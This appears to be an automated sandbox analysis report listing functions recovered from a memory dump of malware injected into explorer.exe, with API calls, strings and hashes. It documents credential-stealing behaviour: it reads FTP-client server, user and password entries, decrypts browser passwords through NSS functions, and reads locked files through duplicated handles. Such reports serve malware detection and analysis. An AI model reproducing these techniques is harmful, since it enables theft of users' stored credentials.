                                                                                                        • Source File: 0000000C.00000002.2734028069.00000000030F1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F1000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_30f1000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CreateHeap
                                                                                                        • String ID: failed to HeapCreate (%lu), flags=%u, initSize=%lu, maxSize=%lu
                                                                                                        • API String ID: 10892065-982776804
                                                                                                        • Opcode ID: a484b6c9ff0338542cfc356d2ca460c4bde2ba3af027b8534ce8da8241affe8c
                                                                                                        • Instruction ID: 06d6df419f0b6e8e09c42423ab2a4e2063c52fdf5eb72635936b0bbd92e855e3
                                                                                                        • Opcode Fuzzy Hash: a484b6c9ff0338542cfc356d2ca460c4bde2ba3af027b8534ce8da8241affe8c
                                                                                                        • Instruction Fuzzy Hash: 3BF0F672746341BFEB32EA54AC88F6767DCD7C8B89F140829FB4996640E3706C408630
                                                                                                        Function 030F1AFE Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 030F1000: GetProcessHeap.KERNEL32(00000008,?,030F11C7,?,?,00000001,00000000,?), ref: 030F1003
                                                                                                          • Part of subcall function 030F1000: RtlAllocateHeap.NTDLL(00000000), ref: 030F100A
                                                                                                        • SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,00000000,00000000,?,?,030F2E83,PathToExe,00000000,00000000), ref: 030F1B16
                                                                                                          • Part of subcall function 030F1011: GetProcessHeap.KERNEL32(00000000,00000000,?,030F1A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,030F1AE2), ref: 030F1020
                                                                                                          • Part of subcall function 030F1011: RtlFreeHeap.NTDLL(00000000,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,030F1AE2,PortNumber,00000000,00000000), ref: 030F1027
                                                                                                          • Part of subcall function 030F19E5: RegOpenKeyExW.KERNELBASE(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,030F1AE2,PortNumber,00000000,00000000), ref: 030F1A1E
                                                                                                          • Part of subcall function 030F19E5: RegQueryValueExW.KERNELBASE(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 030F1A3C
                                                                                                          • Part of subcall function 030F19E5: RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 030F1A75
                                                                                                          • Part of subcall function 030F19E5: RegCloseKey.KERNELBASE(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,030F1AE2,PortNumber,00000000,00000000), ref: 030F1A98
                                                                                                        Strings
                                                                                                        • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 030F1B40
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2734028069.00000000030F1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F1000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_30f1000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Heap$ProcessQueryValue$AllocateCloseFolderFreeOpenPath
                                                                                                        • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                        • API String ID: 2162223993-2036018995
                                                                                                        • Opcode ID: 69d83fdaad9c585b860c69ef42ca2de5ac7216e2b2357624cc56275e51ed01b7
                                                                                                        • Instruction ID: eeb8ab52b5278a4a33e0ef87e5f1f027f921baa381718be21b1f40d56569038f
                                                                                                        • Opcode Fuzzy Hash: 69d83fdaad9c585b860c69ef42ca2de5ac7216e2b2357624cc56275e51ed01b7
                                                                                                        • Instruction Fuzzy Hash: 75F0B43B70174CEFDA19FA6BDC80E6B768ECBC62A630A0069F65997644EE136C015274
                                                                                                        Function 030FA33B Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 36COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 030FA35F
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2734028069.00000000030F1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F1000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_30f1000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FilePointer
                                                                                                        • String ID: winSeekFile
                                                                                                        • API String ID: 973152223-3168307952
                                                                                                        • Opcode ID: 70466815c6aaad2ddd66c31cdb18902169b270edbac7e9ebf2dd38cf569fee21
                                                                                                        • Instruction ID: 17635924ff7f23ead3ee21f85e880b2d1a4abd1610fef21be711f862c88e351d
                                                                                                        • Opcode Fuzzy Hash: 70466815c6aaad2ddd66c31cdb18902169b270edbac7e9ebf2dd38cf569fee21
                                                                                                        • Instruction Fuzzy Hash: DCF09031715304AFDB12EF64DC00AAB77AEEB48321B148669BD75CA6C4DB70DD409AA0
                                                                                                        Function 030F9EA7 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 21memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • RtlAllocateHeap.NTDLL(051F0000,00000000,?), ref: 030F9EB5
                                                                                                        Strings
                                                                                                        • failed to HeapAlloc %u bytes (%lu), heap=%p, xrefs: 030F9ECD
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2734028069.00000000030F1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F1000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_30f1000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AllocateHeap
                                                                                                        • String ID: failed to HeapAlloc %u bytes (%lu), heap=%p
                                                                                                        • API String ID: 1279760036-667713680
                                                                                                        • Opcode ID: b4f0edd643aca22d0bb443568e3cc623249a94c72b3492faf0725f05239dbc5a
                                                                                                        • Instruction ID: 76d3add12e7f1f8f2d1dbdbbb33af2e5d1f10878aa99ce8219636d1419838fe4
                                                                                                        • Opcode Fuzzy Hash: b4f0edd643aca22d0bb443568e3cc623249a94c72b3492faf0725f05239dbc5a
                                                                                                        • Instruction Fuzzy Hash: 25E08C77644310BFCA136794AC04F6FB7689B98E50F050425FA10A6648C330985287B2
                                                                                                        Function 030F9EE8 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 19memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • RtlFreeHeap.NTDLL(051F0000,00000000,?), ref: 030F9EF8
                                                                                                        Strings
                                                                                                        • failed to HeapFree block %p (%lu), heap=%p, xrefs: 030F9F0E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2734028069.00000000030F1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F1000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_30f1000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FreeHeap
                                                                                                        • String ID: failed to HeapFree block %p (%lu), heap=%p
                                                                                                        • API String ID: 3298025750-4030396798
                                                                                                        • Opcode ID: 2b0b83a535700fa982d1e7ec3d6a5e1f95031ff60c28ebf8c08c06fccd37713a
                                                                                                        • Instruction ID: 18ebc91b530eae160b99d0879368bb8358058f23061e3dfb6a2bdc50e62865e5
                                                                                                        • Opcode Fuzzy Hash: 2b0b83a535700fa982d1e7ec3d6a5e1f95031ff60c28ebf8c08c06fccd37713a
                                                                                                        • Instruction Fuzzy Hash: 71D0127B109301FFD646AB549C05F2B777D9B99A00F490418F22495459D37050D9AB72
                                                                                                        Function 030F1B6A Relevance: 3.0, APIs: 2, Instructions: 25fileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,030F2893,00000000,00000000,00000000,?), ref: 030F1B82
                                                                                                        • CloseHandle.KERNELBASE(00000000), ref: 030F1B8F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2734028069.00000000030F1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F1000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_30f1000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CloseCreateFileHandle
                                                                                                        • String ID:
                                                                                                        • API String ID: 3498533004-0
                                                                                                        • Opcode ID: ca5ee7d1ba5ae5e1c089f020561a189782417fa9cc96f1aa28e6c9744c70cee1
                                                                                                        • Instruction ID: 13322649fde5a642ae51c4ec28af40e31d43f63d25705fd0a9cb4bcbd21b4170
                                                                                                        • Opcode Fuzzy Hash: ca5ee7d1ba5ae5e1c089f020561a189782417fa9cc96f1aa28e6c9744c70cee1
                                                                                                        • Instruction Fuzzy Hash: CDD0C275203230E6D6B962353C0CEA7AE4CDF035B5B480610B60CD54C4E310888781F0
                                                                                                        Function 030F1011 Relevance: 3.0, APIs: 2, Instructions: 12memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 030F1162: VirtualQuery.KERNEL32(?,?,0000001C), ref: 030F116F
                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,030F1A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,030F1AE2), ref: 030F1020
                                                                                                        • RtlFreeHeap.NTDLL(00000000,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,030F1AE2,PortNumber,00000000,00000000), ref: 030F1027
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2734028069.00000000030F1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F1000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_30f1000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Heap$FreeProcessQueryVirtual
                                                                                                        • String ID:
                                                                                                        • API String ID: 2580854192-0
                                                                                                        • Opcode ID: ab0457cef0a5db8fc5b97c0cbc52fb997f196978a7a43cde0cc8b6363a42a5b7
                                                                                                        • Instruction ID: 7f048164292818705182d1f4a0b0b0671b2ba5027fd59a0acd201dfc4c0e1e40
                                                                                                        • Opcode Fuzzy Hash: ab0457cef0a5db8fc5b97c0cbc52fb997f196978a7a43cde0cc8b6363a42a5b7
                                                                                                        • Instruction Fuzzy Hash: 65C08C350023609BCAA877A4380CBCA2B08DF8E52AF080441B64197145CBA1888082B0
                                                                                                        Function 030F1000 Relevance: 3.0, APIs: 2, Instructions: 6memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetProcessHeap.KERNEL32(00000008,?,030F11C7,?,?,00000001,00000000,?), ref: 030F1003
                                                                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 030F100A
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2734028069.00000000030F1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F1000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_30f1000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Heap$AllocateProcess
                                                                                                        • String ID:
                                                                                                        • API String ID: 1357844191-0
                                                                                                        • Opcode ID: 5fe0835f14394d821bc9527e0586a4f4d690236ce3a6ed8165b207546da74c19
                                                                                                        • Instruction ID: 7ecefe66d7112e9d137efc56ee224e9fa861f40fd82609d4665411ea54bd1773
                                                                                                        • Opcode Fuzzy Hash: 5fe0835f14394d821bc9527e0586a4f4d690236ce3a6ed8165b207546da74c19
                                                                                                        • Instruction Fuzzy Hash: 04A002795502045BDD4877A49A0DA1A3518F7C9B0AF104554718586045DB6454448731
                                                                                                        Function 030F12A3 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • RtlZeroMemory.NTDLL(?,00000018), ref: 030F12B5
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2734028069.00000000030F1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F1000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_30f1000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MemoryZero
                                                                                                        • String ID:
                                                                                                        • API String ID: 816449071-0
                                                                                                        • Opcode ID: dc19df8127c1519b878b9fe7ac53c56a870b415f72ba685b49028b7a53edef20
                                                                                                        • Instruction ID: 7ae18ad68ba866e38f64b0b834eb07008b004a2ca245f6a179f6613f29b93185
                                                                                                        • Opcode Fuzzy Hash: dc19df8127c1519b878b9fe7ac53c56a870b415f72ba685b49028b7a53edef20
                                                                                                        • Instruction Fuzzy Hash: CD1136B5A01209AFDB54EFE8E884ABEB7FCEB49611B040029FA45E3200D730D941CB70
                                                                                                        Function 030F1B9D Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetFileAttributesW.KERNELBASE(00000000,00000000,030F2C8F,00000000,00000000,?,?,00000000,PathToExe,00000000,00000000), ref: 030F1BAA
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2734028069.00000000030F1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F1000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_30f1000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AttributesFile
                                                                                                        • String ID:
                                                                                                        • API String ID: 3188754299-0
                                                                                                        • Opcode ID: c901c166cca1bdd67d32091c819f4c6bbf360188ecbc187dbb018944d8f4acb9
                                                                                                        • Instruction ID: ddd91391a086215b3a61b55bf7c8a1f2b6005bc0334279084a92af4c26133682
                                                                                                        • Opcode Fuzzy Hash: c901c166cca1bdd67d32091c819f4c6bbf360188ecbc187dbb018944d8f4acb9
                                                                                                        • Instruction Fuzzy Hash: 67D0C933E17531CADAACA6787844896F6D06A4157931E07B4FE26F79D4E325CC8252D0
                                                                                                        Function 030F1677 Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 030F1684
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2734028069.00000000030F1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F1000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_30f1000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CreateGlobalStream
                                                                                                        • String ID:
                                                                                                        • API String ID: 2244384528-0
                                                                                                        • Opcode ID: b06a8da5a7ee1afb4de6c6150125568996fc4bd1c2cb38979827c351a2f331a4
                                                                                                        • Instruction ID: ddce6354b9f12bbf75cf00d70e1e21393541756593fc88c3102016b5d6789d27
                                                                                                        • Opcode Fuzzy Hash: b06a8da5a7ee1afb4de6c6150125568996fc4bd1c2cb38979827c351a2f331a4
                                                                                                        • Instruction Fuzzy Hash: A8C08030111131DFD7741A304C05B8535D49F0D7B2F060969F1C19D0C0D2F404C0C650
                                                                                                        Function 030F104C Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,030F158A), ref: 030F1056
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2734028069.00000000030F1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F1000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_30f1000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AllocVirtual
                                                                                                        • String ID:
                                                                                                        • API String ID: 4275171209-0
                                                                                                        • Opcode ID: 6d67d87942ecf7645ab8637b74eb1643d3062ad5ba85c723784a578576f3dcb9
                                                                                                        • Instruction ID: cbb2d0bbae8623e96bd5b0b6ee39053500b2a31e2c5ac91f016a25325ada6787
                                                                                                        • Opcode Fuzzy Hash: 6d67d87942ecf7645ab8637b74eb1643d3062ad5ba85c723784a578576f3dcb9
                                                                                                        • Instruction Fuzzy Hash: 47A001B47953006AFE696762AE1BF1529289745B06F100244B309690C456E865408529
                                                                                                        Function 030F105D Relevance: 1.3, APIs: 1, Instructions: 5COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,030F4A5B,?,?,00000000,?,?,?,?,030F4B66,?), ref: 030F1065
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2734028069.00000000030F1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F1000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_30f1000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FreeVirtual
                                                                                                        • String ID:
                                                                                                        • API String ID: 1263568516-0
                                                                                                        • Opcode ID: 2594c0034cceab777ad57bce2fb5fc953bd6999e51905933fc941711c817a83d
                                                                                                        • Instruction ID: a0366d577e0dde0b11c812994876aa401e061b887fd8c9b0d8b657224b856982
                                                                                                        • Opcode Fuzzy Hash: 2594c0034cceab777ad57bce2fb5fc953bd6999e51905933fc941711c817a83d
                                                                                                        • Instruction Fuzzy Hash: C8A0027469070066EEB867205D0AF0526146785F05F2045547281A90C54AA5E0848A28

                                                                                                        Non-executed Functions

                                                                                                        Function 030F349B Relevance: 35.2, APIs: 19, Strings: 1, Instructions: 201nativefilestringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • CreateFileW.KERNEL32(?,00000080,00000000,00000000,00000003,00000000,00000000,00000000,00000000,?,00000000), ref: 030F34C0
                                                                                                          • Part of subcall function 030F33C3: NtQueryInformationFile.NTDLL(00000000,00002000,00000000,00002000,0000002F), ref: 030F3401
                                                                                                        • OpenProcess.KERNEL32(00000440,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,030F37A8), ref: 030F34E9
                                                                                                          • Part of subcall function 030F1000: GetProcessHeap.KERNEL32(00000008,?,030F11C7,?,?,00000001,00000000,?), ref: 030F1003
                                                                                                          • Part of subcall function 030F1000: RtlAllocateHeap.NTDLL(00000000), ref: 030F100A
                                                                                                        • NtQueryInformationProcess.NTDLL(00000000,00000033,00000000,?,?), ref: 030F351E
                                                                                                        • NtQueryInformationProcess.NTDLL(00000000,00000033,00000000,?,?), ref: 030F3541
                                                                                                        • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 030F3586
                                                                                                        • DuplicateHandle.KERNEL32(00000000,00000000,00000000), ref: 030F358F
                                                                                                        • lstrcmpiW.KERNEL32(00000000,File), ref: 030F35B6
                                                                                                        • NtQueryObject.NTDLL(?,00000001,00000000,00001000,00000000), ref: 030F35DE
                                                                                                        • StrRChrW.SHLWAPI(?,00000000,0000005C), ref: 030F35F6
                                                                                                        • StrRChrW.SHLWAPI(?,00000000,0000005C), ref: 030F3606
                                                                                                        • lstrcmpiW.KERNEL32(00000000,00000000), ref: 030F361E
                                                                                                        • GetFileSize.KERNEL32(?,00000000), ref: 030F3631
                                                                                                        • SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 030F3658
                                                                                                        • SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 030F366B
                                                                                                        • ReadFile.KERNEL32(?,?,00000000,?,00000000), ref: 030F3681
                                                                                                        • SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 030F36AD
                                                                                                        • CloseHandle.KERNEL32(?), ref: 030F36C0
                                                                                                        • CloseHandle.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,030F37A8), ref: 030F36F5
                                                                                                          • Part of subcall function 030F1C9F: CreateFileW.KERNEL32(?,40000000,00000002,00000000,00000002,00000000,00000000), ref: 030F1CC0
                                                                                                          • Part of subcall function 030F1C9F: WriteFile.KERNEL32(00000000,?,?,?,00000000,?,40000000,00000002,00000000,00000002,00000000,00000000), ref: 030F1CDA
                                                                                                          • Part of subcall function 030F1C9F: CloseHandle.KERNEL32(00000000,?,?,?,00000000,?,40000000,00000002,00000000,00000002,00000000,00000000), ref: 030F1CE6
                                                                                                        • CloseHandle.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,030F37A8), ref: 030F3707
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2734028069.00000000030F1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F1000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_30f1000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: File$HandleProcess$CloseQuery$InformationPointer$CreateHeaplstrcmpi$AllocateCurrentDuplicateObjectOpenReadSizeWrite
                                                                                                        • String ID: File
                                                                                                        • API String ID: 3915112439-749574446
                                                                                                        • Opcode ID: d7b7f7956c5956fc5b18b17c005cf22a9990286dc53e67cb572e89c9ad7c559f
                                                                                                        • Instruction ID: 12668f6b39ffe2d5b4e0acb46df2ae2ab42eca6cc3e1ab13fb898c6b9a553ac7
                                                                                                        • Opcode Fuzzy Hash: d7b7f7956c5956fc5b18b17c005cf22a9990286dc53e67cb572e89c9ad7c559f
                                                                                                        • Instruction Fuzzy Hash: B361B078205300AFD764EF21CC44F2BBBE9EB89B65F040868FA86D6290D775D8848F65
                                                                                                        Function 03144438 Relevance: 19.9, APIs: 3, Strings: 10, Instructions: 359COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • memcmp.NTDLL(localhost,00000007,00000009,00000002,?,00000000,000001D8,?,00000000), ref: 03144502
                                                                                                        • memcmp.NTDLL(00000000,?,?,00000002,?,00000000,000001D8,?,00000000), ref: 0314475F
                                                                                                        • memcpy.NTDLL(00000000,00000000,00000000,00000002,?,00000000,000001D8,?,00000000), ref: 03144803
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2734028069.00000000030F1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F1000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_30f1000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memcmp$memcpy
                                                                                                        • String ID: %s mode not allowed: %s$access$cach$cache$file$invalid uri authority: %.*s$localhost$mode$no such %s mode: %s$no such vfs: %s
                                                                                                        • API String ID: 231171946-1096842476
                                                                                                        • Opcode ID: 6aa308ea5be54295dcb4b39f5d446956edf17345a4e14d50f37fa9b7a233b67f
                                                                                                        • Instruction ID: a60a74e704c2ec371e4099500d928ad21b5f4d5ebbd6dd325664ac9cb09a282f
                                                                                                        • Opcode Fuzzy Hash: 6aa308ea5be54295dcb4b39f5d446956edf17345a4e14d50f37fa9b7a233b67f
                                                                                                        • Instruction Fuzzy Hash: CFC10374A093869FDB34CF1A849077AB7E5AF8D214F0C096EE8D58B251DF34D4468B86
                                                                                                        Function 03115F08 Relevance: 12.3, APIs: 1, Strings: 7, Instructions: 328COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 030F6AAA: memset.NTDLL ref: 030F6AC5
                                                                                                        • memset.NTDLL ref: 03115F53
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2734028069.00000000030F1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F1000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_30f1000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memset
                                                                                                        • String ID: cannot open %s column for writing$cannot open table without rowid: %s$cannot open view: %s$cannot open virtual table: %s$foreign key$indexed$no such column: "%s"
                                                                                                        • API String ID: 2221118986-594550510
                                                                                                        • Opcode ID: 899fa9813df9fe39e893fce9e724fa4951e9125e6ce6fa44c187f09fc3567df8
                                                                                                        • Instruction ID: d31b1125a36c93ab1232674881d14b691fa10efa0b232418616014ef720dd67a
                                                                                                        • Opcode Fuzzy Hash: 899fa9813df9fe39e893fce9e724fa4951e9125e6ce6fa44c187f09fc3567df8
                                                                                                        • Instruction Fuzzy Hash: E8C18D746047019FCB14DF24C480AAEF7E6BFCC700F18896DE8559B241E776D966CB92
                                                                                                        Function 030F4440 Relevance: 38.8, APIs: 12, Strings: 10, Instructions: 289stringcommemoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • CoCreateInstance.COMBASE(031462B0,00000000,00000001,031462A0,?), ref: 030F445F
                                                                                                        • SysAllocString.OLEAUT32(?), ref: 030F44AA
                                                                                                        • lstrcmpiW.KERNEL32(RecentServers,?), ref: 030F456E
                                                                                                        • lstrcmpiW.KERNEL32(Servers,?), ref: 030F457D
                                                                                                        • lstrcmpiW.KERNEL32(Settings,?), ref: 030F458C
                                                                                                          • Part of subcall function 030F11E1: lstrlenW.KERNEL32(?,74DEF360,00000000,?,00000000,?,030F46E3), ref: 030F11ED
                                                                                                          • Part of subcall function 030F11E1: CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 030F120F
                                                                                                          • Part of subcall function 030F11E1: CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 030F1231
                                                                                                        • lstrcmpiW.KERNEL32(Server,?), ref: 030F45BE
                                                                                                        • lstrcmpiW.KERNEL32(LastServer,?), ref: 030F45CD
                                                                                                        • lstrcmpiW.KERNEL32(Host,?), ref: 030F4657
                                                                                                        • lstrcmpiW.KERNEL32(Port,?), ref: 030F4679
                                                                                                        • lstrcmpiW.KERNEL32(User,?), ref: 030F469F
                                                                                                        • lstrcmpiW.KERNEL32(Pass,?), ref: 030F46C5
                                                                                                        • wsprintfW.USER32 ref: 030F471E
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2734028069.00000000030F1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F1000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_30f1000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: lstrcmpi$String$BinaryCrypt$AllocCreateInstancelstrlenwsprintf
                                                                                                        • String ID: %s:%s$Host$LastServer$Pass$Port$RecentServers$Server$Servers$Settings$User
                                                                                                        • API String ID: 2230072276-1234691226
                                                                                                        • Opcode ID: 318f3ec00d0f6c34fae1910a7ce66c644c489c72b34aa01f7bbe6cf5733c482f
                                                                                                        • Instruction ID: 08016da35d17b215477b050bafc7e8b8e40b28dbd60be49ea85a4cfd48098e12
                                                                                                        • Opcode Fuzzy Hash: 318f3ec00d0f6c34fae1910a7ce66c644c489c72b34aa01f7bbe6cf5733c482f
                                                                                                        • Instruction Fuzzy Hash: 0BB11875204302AFD740DF65C844E6BB7E9EFC9749F04895CFA558B260DB71E806CB62
                                                                                                        Function 030F24B0 Relevance: 35.1, APIs: 11, Strings: 9, Instructions: 143libraryloaderCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 030F1000: GetProcessHeap.KERNEL32(00000008,?,030F11C7,?,?,00000001,00000000,?), ref: 030F1003
                                                                                                          • Part of subcall function 030F1000: RtlAllocateHeap.NTDLL(00000000), ref: 030F100A
                                                                                                          • Part of subcall function 030F1090: lstrlenW.KERNEL32(?,?,00000000,030F17E5), ref: 030F1097
                                                                                                          • Part of subcall function 030F1090: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000001,00000000,00000000), ref: 030F10A8
                                                                                                          • Part of subcall function 030F19B4: lstrlenW.KERNEL32(00000000,00000000,00000000,030F2CAF,00000000,00000000,?,?,00000000,PathToExe,00000000,00000000), ref: 030F19C4
                                                                                                        • GetCurrentDirectoryW.KERNEL32(00000104,00000000), ref: 030F2503
                                                                                                        • SetCurrentDirectoryW.KERNEL32(00000000), ref: 030F250A
                                                                                                        • LoadLibraryW.KERNEL32(00000000), ref: 030F2563
                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 030F2570
                                                                                                        • GetProcAddress.KERNEL32(00000000,NSS_Init), ref: 030F2591
                                                                                                        • GetProcAddress.KERNEL32(00000000,NSS_Shutdown), ref: 030F259E
                                                                                                        • GetProcAddress.KERNEL32(00000000,SECITEM_FreeItem), ref: 030F25AB
                                                                                                        • GetProcAddress.KERNEL32(00000000,PK11_GetInternalKeySlot), ref: 030F25B8
                                                                                                        • GetProcAddress.KERNEL32(00000000,PK11_Authenticate), ref: 030F25C5
                                                                                                        • GetProcAddress.KERNEL32(00000000,PK11SDR_Decrypt), ref: 030F25D2
                                                                                                        • GetProcAddress.KERNEL32(00000000,PK11_FreeSlot), ref: 030F25DF
                                                                                                          • Part of subcall function 030F190B: lstrlen.KERNEL32(?,?,?,?,00000000,030F2783), ref: 030F192B
                                                                                                          • Part of subcall function 030F190B: lstrlen.KERNEL32(00000000,?,?,?,00000000,030F2783), ref: 030F1930
                                                                                                          • Part of subcall function 030F190B: lstrcat.KERNEL32(00000000,?), ref: 030F1946
                                                                                                          • Part of subcall function 030F190B: lstrcat.KERNEL32(00000000,00000000), ref: 030F194A
                                                                                                        Strings
